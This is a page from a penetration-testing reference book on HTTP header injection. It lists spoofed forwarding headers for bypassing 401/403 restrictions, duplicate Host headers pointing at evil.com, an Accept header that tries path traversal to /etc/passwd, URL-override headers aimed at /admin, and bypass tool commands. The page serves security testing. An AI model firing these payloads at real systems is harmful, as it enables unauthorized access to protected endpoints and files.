Pentest Book
Search…
/home/six2dez/.pentest-book
Contribute/Donate
Recon
Public info gathering
Root domains
Subdomain Enum
Webs recon
Network Scanning
Host Scanning
Packet Scanning
Enumeration
Files
SSL/TLS
Ports
Web Attacks
General Info
Quick tricks
Header injections
Bruteforcing
Online hashes cracked
Crawl/Fuzz
LFI/RFI
File upload
SQLi
SSRF
Open redirects
XSS
CSP
XXE
Cookie Padding
Webshells
CORS
CSRF
Web Cache Poisoning
Broken Links
Clickjacking
HTTP Request Smuggling
Web Sockets
CRLF
IDOR
Web Cache Deception
Session fixation
Email attacks
Pastejacking
HTTP Parameter pollution
SSTI
Prototype Pollution
Command Injection
Deserialization
DNS rebinding
Web Technologies
Cloud
Exploitation
Payloads
Reverse Shells
File transfer
Post Exploitation
Linux
Pivoting
Windows
Mobile
General
Android
iOS
Others
Burp Suite
Password cracking
VirtualBox
Code review
Pentesting Web checklist
Internal Pentest
Web fuzzers review
Recon suites review
Subdomain tools review
Random
Master assessment mindmaps
BugBounty
Exploiting
tools everywhere
Powered By GitBook
Header injections

Headers

1
# Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console
2
Client-IP:
3
Connection:
4
Contact:
5
Forwarded:
6
From:
7
Host:
8
Origin:
9
Referer:
10
True-Client-IP:
11
X-Client-IP:
12
X-Custom-IP-Authorization:
13
X-Forward-For:
14
X-Forwarded-For:
15
X-Forwarded-Host:
16
X-Forwarded-Server:
17
X-Host:
18
X-Original-URL:
19
X-Originating-IP:
20
X-Real-IP:
21
X-Remote-Addr:
22
X-Remote-IP:
23
X-Rewrite-URL:
24
X-Wap-Profile:
25
​
26
# Try to repeat same Host header 2 times
27
Host: legit.com
28
Stuff: stuff
29
Host: evil.com
30
​
31
# Bypass type limit
32
Accept: application/json, text/javascript, */*; q=0.01
33
Accept: ../../../../../../../../../etc/passwd{{'
34
​
35
# Try to change the HTTP version from 1.1 to HTTP/0.9 and remove the host header
36
​
37
# 401/403 bypasses
38
# Whitelisted IP 127.0.0.1 or localhost
39
Client-IP: 127.0.0.1
40
Forwarded-For-Ip: 127.0.0.1
41
Forwarded-For: 127.0.0.1
42
Forwarded-For: localhost
43
Forwarded: 127.0.0.1
44
Forwarded: localhost
45
True-Client-IP: 127.0.0.1
46
X-Client-IP: 127.0.0.1
47
X-Custom-IP-Authorization: 127.0.0.1
48
X-Forward-For: 127.0.0.1
49
X-Forward: 127.0.0.1
50
X-Forward: localhost
51
X-Forwarded-By: 127.0.0.1
52
X-Forwarded-By: localhost
53
X-Forwarded-For-Original: 127.0.0.1
54
X-Forwarded-For-Original: localhost
55
X-Forwarded-For: 127.0.0.1
56
X-Forwarded-For: localhost
57
X-Forwarded-Server: 127.0.0.1
58
X-Forwarded-Server: localhost
59
X-Forwarded: 127.0.0.1
60
X-Forwarded: localhost
61
X-Forwared-Host: 127.0.0.1
62
X-Forwared-Host: localhost
63
X-Host: 127.0.0.1
64
X-Host: localhost
65
X-HTTP-Host-Override: 127.0.0.1
66
X-Originating-IP: 127.0.0.1
67
X-Real-IP: 127.0.0.1
68
X-Remote-Addr: 127.0.0.1
69
X-Remote-Addr: localhost
70
X-Remote-IP: 127.0.0.1
71
​
72
# Fake Origin - make GET request to accesible endpoint with:
73
X-Original-URL: /admin
74
X-Override-URL: /admin
75
X-Rewrite-URL: /admin
76
Referer: /admin
77
# Also try with absoulte url https:/domain.com/admin
78
​
79
# Method Override
80
X-HTTP-Method-Override: PUT
81
​
82
# Provide full path GET
83
GET https://vulnerable-website.com/ HTTP/1.1
84
Host: evil-website.com
85
​
86
# Add line wrapping
87
GET /index.php HTTP/1.1
88
Host: vulnerable-website.com
89
Host: evil-website.com
90
​
91
# Wordlists
92
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers
93
https://github.com/danielmiessler/SecLists/tree/bbb4d86ec1e234b5d3cfa0a4ab3e20c9d5006405/Miscellaneous/web/http-request-headers
Copied!

Tools

1
# https://github.com/lobuhi/byp4xx
2
./byp4xx.sh https://url/path
3
# https://github.com/OdinF13/Bug-Bounty-Scripts
4
​
5
# https://github.com/mlcsec/headi
6
headi -url http://target.com/admin
Copied!
Previous
Quick tricks
Next
Bruteforcing
Last modified 1yr ago
Export as PDF
Copy link
Edit on GitHub
Contents
Headers
Tools